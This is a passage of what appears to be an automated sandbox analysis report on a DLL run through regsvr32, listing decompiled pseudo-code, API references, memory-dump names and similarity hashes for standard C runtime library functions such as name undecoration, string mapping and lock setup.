Part of subcall function 00007FFD2B06B06C: DName::operator+=.LIBCMT ref: 00007FFD2B06B106

DName::operator+=.LIBCMT ref: 00007FFD2B06B62C

Strings

..., xrefs: 00007FFD2B06B66F
,<ellipsis>, xrefs: 00007FFD2B06B5FB
<ellipsis>, xrefs: 00007FFD2B06B654
,..., xrefs: 00007FFD2B06B621
void, xrefs: 00007FFD2B06B67F

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Name::operator+=$NameName::
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 2762593306-2211150622
Opcode ID: 2d7cf302916db1ecd5d891cd0d34d7e29f4f0e15d4064c183889cdf6d2640d66
Instruction ID: 87081ba2c54c14dc5c786d9782631ac9936f1751ad7a6829e09ff45f00d4cbde
Opcode Fuzzy Hash: 2d7cf302916db1ecd5d891cd0d34d7e29f4f0e15d4064c183889cdf6d2640d66
Instruction Fuzzy Hash: 813184A1F0EB8688F7238B24DD6217467A0FB56704F449271E68D022B5DFBCE541E7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0751C0 Relevance: 12.2, APIs: 8, Instructions: 206COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FFD2B07525A
MultiByteToWideChar.KERNEL32 ref: 00007FFD2B0752F7
LCMapStringW.KERNEL32 ref: 00007FFD2B07531E
LCMapStringW.KERNEL32 ref: 00007FFD2B075366
LCMapStringW.KERNEL32 ref: 00007FFD2B0753F8
WideCharToMultiByte.KERNEL32 ref: 00007FFD2B075438
free.LIBCMT ref: 00007FFD2B07544C

Part of subcall function 00007FFD2B0652E4: _FF_MSGBANNER.LIBCMT ref: 00007FFD2B065314
Part of subcall function 00007FFD2B0652E4: RtlAllocateHeap.NTDLL(?,?,?,00007FFD2B064F2A,?,?,?,00007FFD2B064FA4), ref: 00007FFD2B065339
Part of subcall function 00007FFD2B0652E4: _errno.LIBCMT ref: 00007FFD2B06535D
Part of subcall function 00007FFD2B0652E4: _errno.LIBCMT ref: 00007FFD2B065368

free.LIBCMT ref: 00007FFD2B07545D

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: ByteCharMultiStringWide$_errnofree$AllocateHeap
String ID:
API String ID: 826377931-0
Opcode ID: 71ba438707870b54f0aa3c6e8792739d52b07d9480e9c5713b9f3b8f1337d58f
Instruction ID: 8e761c3b7e5c392a25c8b219b1f373a2cc36659c654f2483c8ac37f49ccab405
Opcode Fuzzy Hash: 71ba438707870b54f0aa3c6e8792739d52b07d9480e9c5713b9f3b8f1337d58f
Instruction Fuzzy Hash: 9F81F932B0A78186EB268F1599501ADB2A1FB4A7A4F240235DA5D43BF5DFBCD501E380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06F88C Relevance: 12.1, APIs: 8, Instructions: 88
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E00007FFD7FFD2B06F88C(signed int __ecx, void* __edx, void* __esi, long long __rbx, long long __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, intOrPtr* __r8, char* __r9, void* __r10, void* __r11, long long _a8, long long _a16, long long _a24) {
				char _v40;
				intOrPtr _v56;
				void* __r12;
				void* _t34;
				signed int _t37;
				void* _t38;
				void* _t41;
				char* _t54;
				long long _t56;
				long long _t84;
				intOrPtr* _t96;
				char* _t97;

				_t56 = __rbx;
				_t41 = __esi;
				_t38 = __edx;
				_t37 = __ecx;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t54 =  *0x2b0c9a70; // 0x0
				_t97 = __r9;
				_t96 = __rdx;
				_t84 = __rcx;
				if ( *_t54 == 0) goto 0x2b06f950;
				if ( *_t54 - 0x36 < 0) goto 0x2b06f8ce;
				if ( *_t54 - 0x39 <= 0) goto 0x2b06f8d3;
				if ( *_t54 != 0x5f) goto 0x2b06f921;
				E00007FFD7FFD2B06A9E0( &_v40, __r9);
				if ( *__rdx == __rbx) goto 0x2b06f8ff;
				if ( *__r8 == __rbx) goto 0x2b06f8f3;
				if (( *(__r8 + 8) & 0x00000100) != 0) goto 0x2b06f8ff;
				E00007FFD7FFD2B06AC78(_t54,  &_v40, __rdx);
				if ( *__r8 == __rbx) goto 0x2b06f910;
				E00007FFD7FFD2B06AC78(_t54,  &_v40, __r8);
				E00007FFD7FFD2B06EAB8(_t37, __rbx, _t84,  &_v40, __r8, _t84, __r8, __r10, __r11);
				goto 0x2b06f9a6;
				_v56 = 0;
				E00007FFD7FFD2B06EFA4(_t56,  &_v40, __r8, _t84, _t97,  &_v40, __r10, __r11);
				r8d = 0 |  *_t97 == 0x0000002a;
				E00007FFD7FFD2B06C43C(_t38, _t41, _t56, _t84,  &_v40, __r8, _t84, _t97, __r10, __r11, _t96);
				goto 0x2b06f9a6;
				E00007FFD7FFD2B06A490(1, _t54,  &_v40);
				E00007FFD7FFD2B06AFE0(_t37, _t41, _t54, _t56,  &_v40, _t97, _t84, _t97);
				if ( *_t96 == _t56) goto 0x2b06f97c;
				E00007FFD7FFD2B06AC78(_t54,  &_v40, _t96);
				if ( *__r8 == _t56) goto 0x2b06f99e;
				if ( *_t96 == _t56) goto 0x2b06f992;
				E00007FFD7FFD2B06AF5C(0x20, _t41, _t54, _t56,  &_v40, _t84, _t97);
				_t34 = E00007FFD7FFD2B06AC78(_t54,  &_v40, __r8);
				asm("movups xmm0, [ebp-0x10]");
				asm("movdqu [esi], xmm0");
				return _t34;
			}

0x7ffd2b06f88c
0x7ffd2b06f88c
0x7ffd2b06f88c
0x7ffd2b06f88c
0x7ffd2b06f88c
0x7ffd2b06f891
0x7ffd2b06f896
0x7ffd2b06f8a7
0x7ffd2b06f8b0
0x7ffd2b06f8b6
0x7ffd2b06f8b9
0x7ffd2b06f8be
0x7ffd2b06f8c7
0x7ffd2b06f8cc
0x7ffd2b06f8d1
0x7ffd2b06f8da
0x7ffd2b06f8e3
0x7ffd2b06f8e8
0x7ffd2b06f8f1
0x7ffd2b06f8fa
0x7ffd2b06f902
0x7ffd2b06f90b
0x7ffd2b06f917
0x7ffd2b06f91c
0x7ffd2b06f92e
0x7ffd2b06f932
0x7ffd2b06f946
0x7ffd2b06f949
0x7ffd2b06f94e
0x7ffd2b06f959
0x7ffd2b06f965
0x7ffd2b06f96e
0x7ffd2b06f977
0x7ffd2b06f97f
0x7ffd2b06f985
0x7ffd2b06f98d
0x7ffd2b06f999
0x7ffd2b06f99e
0x7ffd2b06f9a2
0x7ffd2b06f9c1

APIs

DName::DName.LIBCMT ref: 00007FFD2B06F8DA
DName::operator+=.LIBCMT ref: 00007FFD2B06F8FA
DName::operator+=.LIBCMT ref: 00007FFD2B06F90B
UnDecorator::getPtrRefDataType.LIBCMT ref: 00007FFD2B06F949
DName::operator+=.LIBCMT ref: 00007FFD2B06F965
DName::operator+=.LIBCMT ref: 00007FFD2B06F977
DName::operator+=.LIBCMT ref: 00007FFD2B06F98D
DName::operator+=.LIBCMT ref: 00007FFD2B06F999

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Name::operator+=$DataDecorator::getNameName::Type
String ID:
API String ID: 3992992251-0
Opcode ID: 7e6c286c6c48ef6f753f78de37e16501fa56a0ee91237fe5db063ec76c69990d
Instruction ID: 5bb892378e50b4403384d326c33749154940855e2312be991fbeab0db554c765
Opcode Fuzzy Hash: 7e6c286c6c48ef6f753f78de37e16501fa56a0ee91237fe5db063ec76c69990d
Instruction Fuzzy Hash: DF319F62F0A7525DFB129B629A620BD2360BB567C4F444832DE5C026AADFBCD091D3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0695F0 Relevance: 12.1, APIs: 8, Instructions: 59
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 48%

			E00007FFD7FFD2B0695F0(void* __ecx, long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* _t21;
				long long _t36;
				void* _t38;
				void* _t41;
				signed long long _t48;

				_t50 = __rsi;
				_t41 = __rcx;
				_t36 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t38 = __ecx;
				if ( *0x2b0c96c8 != 0) goto 0x2b06962e;
				E00007FFD7FFD2B06758C();
				_t4 = _t50 + 0x1d; // 0x1e
				E00007FFD7FFD2B06732C(_t4,  *0x2b0c96c8, _t38, __rsi, __rbp);
				E00007FFD7FFD2B066F0C();
				_t48 = _t38 + _t38;
				if ( *((long long*)(0x2b0c7680 + _t48 * 8)) == 0) goto 0x2b069647;
				goto 0x2b0696c0;
				E00007FFD7FFD2B0678EC(0x28,  *((long long*)(0x2b0c7680 + _t48 * 8)), _t38, _t41, _t48, _t50);
				if (_t36 != 0) goto 0x2b069668;
				E00007FFD7FFD2B067698(_t36);
				 *_t36 = 0xc;
				goto 0x2b0696c0;
				E00007FFD7FFD2B0696D8();
				if ( *((long long*)(0x2b0c7680 + _t48 * 8)) != 0) goto 0x2b0696ab;
				if (InitializeCriticalSectionAndSpinCount(??, ??) != 0) goto 0x2b0696a4;
				free(??);
				_t21 = E00007FFD7FFD2B067698(_t36);
				 *_t36 = 0xc;
				goto 0x2b0696b1;
				 *((long long*)(0x2b0c7680 + _t48 * 8)) = _t36;
				goto 0x2b0696b1;
				free(??);
				LeaveCriticalSection(??);
				goto 0x2b069643;
				return _t21;
			}

0x7ffd2b0695f0
0x7ffd2b0695f0
0x7ffd2b0695f0
0x7ffd2b0695f0
0x7ffd2b0695f5
0x7ffd2b0695fa
0x7ffd2b069605
0x7ffd2b069615
0x7ffd2b069617
0x7ffd2b06961c
0x7ffd2b06961f
0x7ffd2b069629
0x7ffd2b069631
0x7ffd2b069641
0x7ffd2b069645
0x7ffd2b06964c
0x7ffd2b069657
0x7ffd2b069659
0x7ffd2b06965e
0x7ffd2b069666
0x7ffd2b06966d
0x7ffd2b06967c
0x7ffd2b06968b
0x7ffd2b069690
0x7ffd2b069695
0x7ffd2b06969a
0x7ffd2b0696a2
0x7ffd2b0696a4
0x7ffd2b0696a9
0x7ffd2b0696ab
0x7ffd2b0696b8
0x7ffd2b0696be
0x7ffd2b0696d5

APIs

_FF_MSGBANNER.LIBCMT ref: 00007FFD2B069617

Part of subcall function 00007FFD2B06758C: _set_error_mode.LIBCMT ref: 00007FFD2B067595
Part of subcall function 00007FFD2B06758C: _set_error_mode.LIBCMT ref: 00007FFD2B0675A4

Part of subcall function 00007FFD2B06732C: _set_error_mode.LIBCMT ref: 00007FFD2B067371
Part of subcall function 00007FFD2B06732C: _set_error_mode.LIBCMT ref: 00007FFD2B067382
Part of subcall function 00007FFD2B06732C: GetModuleFileNameW.KERNEL32 ref: 00007FFD2B0673E4

Part of subcall function 00007FFD2B066F0C: ExitProcess.KERNEL32 ref: 00007FFD2B066F1B

Part of subcall function 00007FFD2B0678EC: Sleep.KERNEL32(?,?,?,00007FFD2B069651,?,?,?,00007FFD2B0696FB,?,?,?,?,?,?,00000000,00007FFD2B067F30), ref: 00007FFD2B06792A

_errno.LIBCMT ref: 00007FFD2B069659
_lock.LIBCMT ref: 00007FFD2B06966D
InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,00007FFD2B0696FB,?,?,?,?,?,?,00000000,00007FFD2B067F30), ref: 00007FFD2B069683
free.LIBCMT ref: 00007FFD2B069690
_errno.LIBCMT ref: 00007FFD2B069695
LeaveCriticalSection.KERNEL32(?,?,?,00007FFD2B0696FB,?,?,?,?,?,?,00000000,00007FFD2B067F30), ref: 00007FFD2B0696B8

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfree
String ID:
API String ID: 4009675462-0
Opcode ID: 685001a587131c23b7d419c8656bc22d27c73556493ddaaae7142070e5070203
Instruction ID: fad845d11e2bf2d4dc9e3aed6cfb52c045c7c60e0a073f7247eab3b0e90e3112
Opcode Fuzzy Hash: 685001a587131c23b7d419c8656bc22d27c73556493ddaaae7142070e5070203
Instruction Fuzzy Hash: 4B214131F0B6428DF656AF60AE263792254EF9A740F044134FA4E47AF6CFBCE440A791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B076B58 Relevance: 10.8, APIs: 7, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00007FFD7FFD2B076B58(intOrPtr* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* _v40;
				long long _v48;
				char _v56;
				long long _v72;
				void* __rbp;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				char _t138;
				char _t139;
				char _t140;
				signed int _t190;
				intOrPtr* _t196;
				intOrPtr _t204;
				intOrPtr* _t206;
				char* _t275;
				char* _t276;
				long long _t278;
				long long _t281;
				void* _t284;
				char* _t288;
				void* _t291;
				long long _t294;
				long long _t295;
				long long _t296;
				intOrPtr* _t297;

				_t291 = __r9;
				_t287 = __r8;
				_t278 = __rdi;
				_t233 = __rcx;
				_t231 = __rbx;
				_t206 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t281 = __rcx;
				_v56 = __rcx;
				r13d = 0;
				_v48 = __rbx;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 0) goto 0x2b076ba0;
				if ( *((intOrPtr*)(__rcx + 0x1c)) != 0) goto 0x2b076ba0;
				r14d = 0;
				goto 0x2b076f9f;
				r15d = 0x98;
				E00007FFD7FFD2B06796C(__rbx, __rcx, __rdx, __rdi, __rcx, _t284);
				_t294 = _t206;
				if (_t206 != 0) goto 0x2b076bc5;
				goto 0x2b076fee;
				E00007FFD7FFD2B0678EC(4, _t206, _t231, _t233, _t278, _t281);
				_t296 = _t206;
				if (_t206 != 0) goto 0x2b076be3;
				free(??);
				goto 0x2b076bbb;
				 *_t206 = 0;
				if ( *((intOrPtr*)(_t281 + 0x18)) == 0) goto 0x2b076f2b;
				E00007FFD7FFD2B0678EC(4,  *((intOrPtr*)(_t281 + 0x18)), _t231, _t278, _t278, _t281);
				_t295 = _t206;
				_t196 = _t206;
				if (_t196 != 0) goto 0x2b076c0b;
				free(??);
				goto 0x2b076bdc;
				 *_t206 = 0;
				_t190 =  *(_t281 + 0x38) & 0x0000ffff;
				r9d = 0x15;
				_t10 = _t294 + 0x18; // 0x18
				r8d = _t190;
				_v72 = _t10;
				_t115 = E00007FFD7FFD2B072BF4(__r9 - 0x14,  &_v56, __r8);
				_t14 = _t294 + 0x20; // 0x20
				r9d = 0x14;
				_v72 = _t14;
				r8d = _t190;
				_t116 = E00007FFD7FFD2B072BF4(_t291 - 0x13,  &_v56, __r8);
				_t18 = _t294 + 0x28; // 0x28
				r9d = 0x16;
				_v72 = _t18;
				r8d = _t190;
				_t117 = E00007FFD7FFD2B072BF4(_t291 - 0x15,  &_v56, __r8);
				r9d = 0x17;
				_t23 = _t294 + 0x30; // 0x30
				r8d = _t190;
				_v72 = _t23;
				_t118 = E00007FFD7FFD2B072BF4(_t291 - 0x16,  &_v56, __r8);
				r9d = 0x18;
				_t26 = _t294 + 0x38; // 0x38
				_t297 = _t26;
				r8d = _t190;
				_v72 = _t297;
				_t119 = E00007FFD7FFD2B072BF4(_t291 - 0x17,  &_v56, _t287);
				r9d = 0x50;
				_t30 = _t294 + 0x40; // 0x40
				r8d = _t190;
				_v72 = _t30;
				_t120 = E00007FFD7FFD2B072BF4(_t291 - 0x4f,  &_v56, _t287);
				r9d = 0x51;
				_t34 = _t294 + 0x48; // 0x48
				r8d = _t190;
				_v72 = _t34;
				_t121 = E00007FFD7FFD2B072BF4(_t291 - 0x50,  &_v56, _t287);
				r9d = 0x1a;
				_t39 = _t294 + 0x50; // 0x50
				r8d = _t190;
				_v72 = _t39;
				_t122 = E00007FFD7FFD2B072BF4(0,  &_v56, _t287);
				r9d = 0x19;
				_t42 = _t294 + 0x51; // 0x51
				r8d = _t190;
				_v72 = _t42;
				_t123 = E00007FFD7FFD2B072BF4(0,  &_v56, _t287);
				r9d = 0x54;
				_t45 = _t294 + 0x52; // 0x52
				r8d = _t190;
				_v72 = _t45;
				_t124 = E00007FFD7FFD2B072BF4(0,  &_v56, _t287);
				_t47 = _t294 + 0x53; // 0x53
				r9d = 0x55;
				r8d = _t190;
				_v72 = _t47;
				_t125 = E00007FFD7FFD2B072BF4(0,  &_v56, _t287);
				_t51 = _t294 + 0x54; // 0x54
				r9d = 0x56;
				r8d = _t190;
				_v72 = _t51;
				_t126 = E00007FFD7FFD2B072BF4(0,  &_v56, _t287);
				r9d = 0x57;
				_t54 = _t294 + 0x55; // 0x55
				r8d = _t190;
				_v72 = _t54;
				_t127 = E00007FFD7FFD2B072BF4(0,  &_v56, _t287);
				r9d = 0x52;
				_t57 = _t294 + 0x56; // 0x56
				r8d = _t190;
				_v72 = _t57;
				_t128 = E00007FFD7FFD2B072BF4(0,  &_v56, _t287);
				r9d = 0x53;
				_t60 = _t294 + 0x57; // 0x57
				r8d = _t190;
				_v72 = _t60;
				_t129 = E00007FFD7FFD2B072BF4(0,  &_v56, _t287);
				r9d = 0x15;
				_t63 = _t294 + 0x68; // 0x68
				r8d = _t190;
				_v72 = _t63;
				_t130 = E00007FFD7FFD2B072BF4(_t291 - 0x13,  &_v56, _t287);
				r9d = 0x14;
				_t67 = _t294 + 0x70; // 0x70
				r8d = _t190;
				_v72 = _t67;
				_t131 = E00007FFD7FFD2B072BF4(_t291 - 0x12,  &_v56, _t287);
				r9d = 0x16;
				_t71 = _t294 + 0x78; // 0x78
				r8d = _t190;
				_v72 = _t71;
				_t132 = E00007FFD7FFD2B072BF4(_t291 - 0x14,  &_v56, _t287);
				r9d = 0x17;
				_t75 = _t294 + 0x80; // 0x80
				r8d = _t190;
				_v72 = _t75;
				_t133 = E00007FFD7FFD2B072BF4(_t291 - 0x15,  &_v56, _t287);
				r9d = 0x50;
				_t79 = _t294 + 0x88; // 0x88
				r8d = _t190;
				_v72 = _t79;
				_t134 = E00007FFD7FFD2B072BF4(_t291 - 0x4e,  &_v56, _t287);
				r9d = 0x51;
				_t82 = _t294 + 0x90; // 0x90
				r8d = _t190;
				_v72 = _t82;
				_t135 = E00007FFD7FFD2B072BF4(_t291 - 0x4f,  &_v56, _t287);
				if (_t196 == 0) goto 0x2b076ef6;
				E00007FFD7FFD2B076A4C(_t135 | _t115 | _t116 | _t117 | _t118 | _t119 | _t120 | _t121 | _t122 | _t123 | _t124 | _t125 | _t126 | _t127 | _t128 | _t129 | _t130 | _t131 | _t132 | _t133 | _t134, _t294);
				free(??);
				free(??);
				goto 0x2b076bdc;
				_t275 =  *_t297;
				goto 0x2b076f0e;
				_t138 =  *_t275;
				if (_t138 - 0x30 < 0) goto 0x2b076f14;
				if (_t138 - 0x39 > 0) goto 0x2b076f14;
				_t139 = _t138 - 0x30;
				 *_t275 = _t139;
				_t276 = _t275 + 1;
				if ( *_t276 != 0) goto 0x2b076efd;
				goto 0x2b076f3d;
				if (_t139 != 0x3b) goto 0x2b076f0b;
				_t288 = _t276;
				_t140 =  *((intOrPtr*)(_t288 + 1));
				 *_t288 = _t140;
				if (_t140 != 0) goto 0x2b076f1b;
				goto 0x2b076f0e;
				E00007FFD7FFD2B064B80(4, _t140, _t294, 0x2b0c8490, _t297);
				 *_t294 =  *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x128))));
				 *((long long*)(_t294 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x128)) + 8));
				 *((long long*)(_t294 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x128)) + 0x10));
				 *((long long*)(_t294 + 0x58)) =  *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x128)) + 0x58));
				 *((long long*)(_t294 + 0x60)) =  *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x128)) + 0x60));
				 *_t296 = 1;
				if (_t295 == 0) goto 0x2b076f9f;
				 *_t295 = 1;
				if ( *((intOrPtr*)(_t281 + 0x120)) == 0) goto 0x2b076fae;
				asm("lock dec dword [eax]");
				_t204 =  *((intOrPtr*)(_t281 + 0x110));
				if (_t204 == 0) goto 0x2b076fd7;
				asm("lock dec dword [ecx]");
				if (_t204 != 0) goto 0x2b076fd7;
				free(??);
				free(??);
				 *((long long*)(_t281 + 0x120)) = _t295;
				 *((long long*)(_t281 + 0x110)) = _t296;
				 *((long long*)(_t281 + 0x128)) = _t294;
				return 0;
			}

0x7ffd2b076b58
0x7ffd2b076b58
0x7ffd2b076b58
0x7ffd2b076b58
0x7ffd2b076b58
0x7ffd2b076b58
0x7ffd2b076b58
0x7ffd2b076b5d
0x7ffd2b076b62
0x7ffd2b076b79
0x7ffd2b076b7c
0x7ffd2b076b80
0x7ffd2b076b83
0x7ffd2b076b8a
0x7ffd2b076b8f
0x7ffd2b076b91
0x7ffd2b076b9b
0x7ffd2b076ba0
0x7ffd2b076bae
0x7ffd2b076bb3
0x7ffd2b076bb9
0x7ffd2b076bc0
0x7ffd2b076bcc
0x7ffd2b076bd1
0x7ffd2b076bd7
0x7ffd2b076bdc
0x7ffd2b076be1
0x7ffd2b076be3
0x7ffd2b076be8
0x7ffd2b076bf1
0x7ffd2b076bf6
0x7ffd2b076bf9
0x7ffd2b076bfc
0x7ffd2b076c01
0x7ffd2b076c09
0x7ffd2b076c0b
0x7ffd2b076c0d
0x7ffd2b076c11
0x7ffd2b076c17
0x7ffd2b076c24
0x7ffd2b076c27
0x7ffd2b076c2c
0x7ffd2b076c31
0x7ffd2b076c36
0x7ffd2b076c3c
0x7ffd2b076c49
0x7ffd2b076c4e
0x7ffd2b076c53
0x7ffd2b076c58
0x7ffd2b076c5e
0x7ffd2b076c6b
0x7ffd2b076c70
0x7ffd2b076c75
0x7ffd2b076c81
0x7ffd2b076c8a
0x7ffd2b076c8d
0x7ffd2b076c92
0x7ffd2b076c97
0x7ffd2b076c9d
0x7ffd2b076c9d
0x7ffd2b076caa
0x7ffd2b076caf
0x7ffd2b076cb4
0x7ffd2b076cb9
0x7ffd2b076cc1
0x7ffd2b076cce
0x7ffd2b076cd1
0x7ffd2b076cd6
0x7ffd2b076cdb
0x7ffd2b076ce3
0x7ffd2b076cf0
0x7ffd2b076cf3
0x7ffd2b076cf8
0x7ffd2b076d01
0x7ffd2b076d09
0x7ffd2b076d0e
0x7ffd2b076d13
0x7ffd2b076d18
0x7ffd2b076d21
0x7ffd2b076d29
0x7ffd2b076d2e
0x7ffd2b076d33
0x7ffd2b076d38
0x7ffd2b076d41
0x7ffd2b076d49
0x7ffd2b076d4e
0x7ffd2b076d53
0x7ffd2b076d58
0x7ffd2b076d5f
0x7ffd2b076d68
0x7ffd2b076d6e
0x7ffd2b076d73
0x7ffd2b076d78
0x7ffd2b076d83
0x7ffd2b076d88
0x7ffd2b076d8e
0x7ffd2b076d93
0x7ffd2b076d98
0x7ffd2b076da1
0x7ffd2b076da9
0x7ffd2b076dae
0x7ffd2b076db3
0x7ffd2b076db8
0x7ffd2b076dc1
0x7ffd2b076dc9
0x7ffd2b076dce
0x7ffd2b076dd3
0x7ffd2b076dd8
0x7ffd2b076de1
0x7ffd2b076de9
0x7ffd2b076dee
0x7ffd2b076df3
0x7ffd2b076df8
0x7ffd2b076dfd
0x7ffd2b076e09
0x7ffd2b076e12
0x7ffd2b076e15
0x7ffd2b076e1a
0x7ffd2b076e1f
0x7ffd2b076e2b
0x7ffd2b076e34
0x7ffd2b076e37
0x7ffd2b076e3c
0x7ffd2b076e41
0x7ffd2b076e4d
0x7ffd2b076e56
0x7ffd2b076e59
0x7ffd2b076e5e
0x7ffd2b076e63
0x7ffd2b076e6f
0x7ffd2b076e7b
0x7ffd2b076e7e
0x7ffd2b076e83
0x7ffd2b076e88
0x7ffd2b076e94
0x7ffd2b076ea0
0x7ffd2b076ea3
0x7ffd2b076ea8
0x7ffd2b076eaf
0x7ffd2b076eb5
0x7ffd2b076ec5
0x7ffd2b076ec8
0x7ffd2b076ecd
0x7ffd2b076ed4
0x7ffd2b076ed9
0x7ffd2b076ee1
0x7ffd2b076ee9
0x7ffd2b076ef1
0x7ffd2b076ef6
0x7ffd2b076efb
0x7ffd2b076efd
0x7ffd2b076f01
0x7ffd2b076f05
0x7ffd2b076f07
0x7ffd2b076f09
0x7ffd2b076f0b
0x7ffd2b076f10
0x7ffd2b076f12
0x7ffd2b076f16
0x7ffd2b076f18
0x7ffd2b076f1b
0x7ffd2b076f1f
0x7ffd2b076f27
0x7ffd2b076f29
0x7ffd2b076f38
0x7ffd2b076f47
0x7ffd2b076f56
0x7ffd2b076f66
0x7ffd2b076f76
0x7ffd2b076f86
0x7ffd2b076f8b
0x7ffd2b076f95
0x7ffd2b076f97
0x7ffd2b076fa9
0x7ffd2b076fab
0x7ffd2b076fb5
0x7ffd2b076fb8
0x7ffd2b076fba
0x7ffd2b076fbd
0x7ffd2b076fc6
0x7ffd2b076fd2
0x7ffd2b076fd7
0x7ffd2b076fde
0x7ffd2b076fe5
0x7ffd2b07700b

APIs

free.LIBCMT ref: 00007FFD2B076BDC
free.LIBCMT ref: 00007FFD2B076C01
free.LIBCMT ref: 00007FFD2B076FC6
free.LIBCMT ref: 00007FFD2B076FD2

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

